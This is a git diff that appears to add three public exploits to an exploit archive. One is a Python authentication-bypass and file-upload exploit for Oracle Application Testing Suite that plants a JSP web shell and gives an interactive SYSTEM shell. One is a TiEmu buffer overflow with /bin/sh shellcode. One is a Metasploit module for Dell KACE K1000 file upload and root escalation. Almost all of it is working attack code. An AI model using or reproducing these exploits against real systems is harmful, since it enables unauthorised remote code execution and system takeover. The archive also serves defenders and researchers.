diff --git a/files.csv b/files.csv index 1edb6b361..1cc8bf48d 100755 --- a/files.csv +++ b/files.csv @@ -35908,3 +35908,6 @@ id,file,description,date,author,platform,type,port 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0_ 7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80 +39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088 +39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0 +39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 File Upload",2016-04-13,metasploit,unix,remote,0 diff --git a/platforms/jsp/webapps/39691.py b/platforms/jsp/webapps/39691.py new file mode 100755 index 000000000..1aea01378 --- /dev/null +++ b/platforms/jsp/webapps/39691.py @@ -0,0 +1,107 @@ +# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit +# Exploit Author: Zhou Yu <504137480@qq.com > +# Vendor Homepage: http://www.oracle.com/ +# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn +# Version: 12.4.0.2.0 +# Tested on: Win7 SP1 32-bit +# CVE : CVE-2016-0492 and CVE-2016-0491 + +import urllib2 +import urllib + +ip = '192.168.150.239' +port = 8088 + +url = "http://" + ip + ":" + str(port) +#bypass authentication +url = url+"/olt/Login.do/../../olt/UploadFileUpload.do" +request = urllib2.Request(url) + +webshell_content=''' +<%@ page import="java.util.*,java.io.*" %> + <% + if (request.getParameter("{cmd}") != null) {{ + Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("{cmd}")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while (disr != null) {{ + out.println(disr); + disr = dis.readLine(); + }} + }} + %> +''' +boundary = "---------------------------7e01e2240a1e" +request.add_header('Content-Type', "multipart/form-data; boundary=" + boundary) +post_data = "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.extension\"\r\n" +post_data = post_data + "\r\n.jsp\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName1\"\r\n" +post_data = post_data + "\r\nwebshell.jsp\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName2\"\r\n" +post_data = post_data + "\r\n\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName3\"\r\n" +post_data = post_data + "\r\n\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileName4\"\r\n" +post_data = post_data + "\r\n\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"fileType\"\r\n" +post_data = post_data + "\r\n*\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"file1\"; filename=\"webshell.jsp\"\r\n" +post_data = post_data + "Content-Type: text/plain\r\n" +post_data = post_data + "\r\n" + webshell_content +"\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.repository\"\r\n" +post_data = post_data + "\r\nDefault\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"storage.workspace\"\r\n" +post_data = post_data + "\r\n.\r\n" +post_data = post_data + "--" + boundary + "\r\n" +post_data = post_data + "Content-Disposition: form-data; name=\"directory\"\r\n" +post_data = post_data + "\r\n" + "../oats\servers\AdminServer\\tmp\_WL_user\oats_ee\\1ryhnd\war\pages" +"\r\n" +post_data = post_data + "--" + boundary + "--"+"\r\n" + +try: + request.add_data(post_data) + response = urllib2.urlopen(request) + if response.code == 200 : + print "[+]upload done!" + webshellurl = "http://" + ip + ":" + str(port) + "/olt/pages/webshell.jsp" + print "[+]wait a moment,detecting whether the webshell exists..." + if urllib2.urlopen(webshellurl).code == 200 : + print "[+]upload webshell successfully!" + print "[+]return a cmd shell" + while True: + cmd = raw_input(">>: ") + if cmd == "exit" : + break + print urllib.urlopen(webshellurl+"?{cmd}=" + cmd).read().lstrip() + else: + print "[-]attack fail!" + else: + print "[-]attack fail!" +except Exception as e: + print "[-]attack fail!" + +''' +#run the exploit and get a cmd shell +root@kali:~/Desktop# python exploit.py +[+]upload done! +[+]wait a moment,detecting whether the webshell exists... +[+]upload webshell successfully! +[+]return a cmd shell +>>: whoami +nt authority\system + + +>>: exit +''' + + diff --git a/platforms/linux/local/39692.py b/platforms/linux/local/39692.py new file mode 100755 index 000000000..e863e3f63 --- /dev/null +++ b/platforms/linux/local/39692.py @@ -0,0 +1,70 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com - +jsacco@exploitpack.com +# Program affected: Texas Instruments calculators emulator (without GDB) +# Version: 3.03-nogdb+dfsg-3 +# +# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org +# Program description: TiEmu emulates Texas Instruments calculators TI +9/92/92+/V200PLT. +# Kali Linux 2.0 package: pool/main/t/tiemu/tiemu_3.03-nogdb+dfsg-3_i386.deb +# MD5sum: 79a42bb40dfa8437b6808a9072faf001 +# Website: http://lpg.ticalc.org/prj_tiemu/ +# +# +# Starting program: /usr/bin/tiemu -rom=$(python -c 'print "A"*80') +# [Thread debugging using libthread_db enabled] +# Using host libthread_db library +"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1". +# TiEmu 3 - Version 3.03 +# THIS PROGRAM COMES WITH ABSOLUTELY NO WARRANTY +# PLEASE READ THE DOCUMENTATION FOR DETAILS +# +# Program received signal SIGSEGV, Segmentation fault. +# +# 0x41414141 in ?? () +# +# gdb$ backtrace +#0 0xb7fdebe0 in __kernel_vsyscall () +#1 0xb6ec9367 in __GI_raise (sig=sig@entry=0x6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#2 0xb6ecaa23 in __GI_abort () at abort.c:89 +#3 0xb6f07778 in __libc_message (do_abort=do_abort@entry=0x2, +fmt=fmt@entry=0xb6ffd715 "*** %s ***: %s +#4 0xb6f97b85 in __GI___fortify_fail (msg=msg@entry=0xb6ffd6fd "stack +smashing detected") at fortify_fail.c:31 +#5 0xb6f97b3a in __stack_chk_fail () at stack_chk_fail.c:28 +#6 0x0811beb3 in _start () + +import os,subprocess + +def run(): + try: + print "# Texas Instrument Emulator Buffer Overflow by Juan Sacco" + print "# This exploit is for educational purposes only" + # JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*84 + shellcode = +"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*12 + eip = "\xd1\xf3\xff\xbf" + subprocess.call(["tiem ",'-rom= ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "Sorry, Texas Instrument emulator not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Snap! Something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit Tiem 3.03-nogdb+dfsg-3 Local Overflow Exploit" + print "Author: Juan Sacco" + except IndexError: + howtousage() +run() diff --git a/platforms/unix/remote/39693.rb b/platforms/unix/remote/39693.rb new file mode 100755 index 000000000..f5154e4f8 --- /dev/null +++ b/platforms/unix/remote/39693.rb @@ -0,0 +1,127 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Dell KACE K1000 File Upload', + 'Description' => %q{ + This module exploits a file upload vulnerability in Kace K1000 + versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547 + which allows unauthenticated users to execute arbitrary commands + under the context of the 'www' user. + + This module also abuses the 'KSudoClient::RunCommandWait' function + to gain root privileges. + + This module has been tested successfully with Dell KACE K1000 + version 5.3. + }, + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Platform' => 'unix', # FreeBSD + 'Arch' => ARCH_CMD, + 'Author' => + [ + 'Bradley Austin (steponequit)', # Initial discovery and exploit + 'Brendan Coles ', # Metasploit + ], + 'References' => + [ + ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html'] + ], + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x27", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl' + } + }, + 'DefaultTarget' => 0, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DisclosureDate' => 'Mar 7 2014')) + end + + def check + res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php')) + unless res + vprint_error('Connection failed') + return Exploit::CheckCode::Unknown + end + if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000' + if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/ + vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}") + if $1.to_i == 5 && $2.to_i <= 3 # 5.0 to 5.3 + return Exploit::CheckCode::Vulnerable + elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849 # 5.4 prior to 5.4.76849 + return Exploit::CheckCode::Vulnerable + elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547 # 5.5 prior to 5.5.90547 + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Detected + end + Exploit::CheckCode::Safe + end + + def exploit + # upload payload + fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php" + payload_path = "/kbox/kboxwww/tmp/" + post_data = "" + print_status("Uploading #{fname} (#{post_data.length} bytes)") + res = send_request_cgi( + 'uri' => normalize_uri('service', 'kbot_upload.php'), + 'method' => 'POST', + 'vars_get' => Hash[{ + 'filename' => fname, + 'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}", + 'checksum' => 'SCRAMBLE', + 'mac' => rand_text_alphanumeric(rand(8) + 5), + 'kbotId' => rand_text_alphanumeric(rand(8) + 5), + 'version' => rand_text_alphanumeric(rand(8) + 5), + 'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle], + 'data' => post_data) + + unless res + fail_with(Failure::Unreachable, 'Connection failed') + end + + if res.code && res.code == 200 + print_good('Payload uploaded successfully') + else + fail_with(Failure::UnexpectedReply, 'Unable to upload payload') + end + + # execute payload + res = send_request_cgi('uri' => normalize_uri('tmp', fname)) + + unless res + fail_with(Failure::Unreachable, 'Connection failed') + end + + if res.code && res.code == 200 + print_good('Payload executed successfully') + elsif res.code && res.code == 404 + fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'") + else + fail_with(Failure::UnexpectedReply, 'Unable to execute payload') + end + end +end \ No newline at end of file